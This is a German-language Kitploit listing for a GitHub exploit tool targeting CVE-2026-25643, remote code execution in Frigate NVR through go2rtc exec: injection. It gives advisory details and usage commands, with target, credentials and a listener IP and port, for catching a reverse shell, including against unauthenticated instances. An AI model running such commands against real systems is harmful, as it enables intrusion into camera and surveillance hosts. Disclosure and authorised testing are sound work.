Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25643-Frigate-RCE — Exploit für Frigate NVR authentifizierte RCE über go2rtc exec: Protokollinjektion, Automatisierung der Ausführung von Systembefehlen und Erfassung einer Reverse Shell. | Kitploit
Tools/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

Exploit für Frigate NVR authentifizierte RCE über go2rtc exec: Protokollinjektion, Automatisierung der Ausführung von Systembefehlen und Erfassung einer Reverse Shell.

Repository anzeigen
33vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-25643: Frigate NVR <= 0.16.3 authentifizierte RCE

Exploit-Titel: Frigate NVR <= 0.16.3 - authentifizierte Remote-Code- Ausführung
Datum: 2026-02-05
Exploit-Autor: jduardo2704
Anbieter-Homepage: https://frigate.video/
Software-Link: https://github.com/blakeblackshear/frigate
Version: <= 0.16.3
CVE: CVE-2026-25643 Sicherheitshinweis: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Beschreibung

Frigate-Versionen bis einschließlich 0.16.3 sind anfällig für Remote-Code-Ausführung (RCE) über die go2rtc-Konfiguration. Ein Angreifer mit authentifiziertem Zugriff (oder ohne Authentifizierung, falls die Instanz offen ist) kann Systembefehle über das exec:-Protokoll in die Stream-Konfiguration einschleusen. Dieser Exploit automatisiert die Payload-Injektion, startet den Dienst neu und fängt die Reverse-Shell ab.

Installation

root@kitploit:~
pip install requests pyyaml

Verwendung

Authentifizierter Modus:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

Nicht authentifizierter Modus (falls offen zugänglich):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

Haftungsausschluss

Dieses Skript ist nur für Bildungszwecke und autorisierte Sicherheitstests gedacht.

Tool herunterladen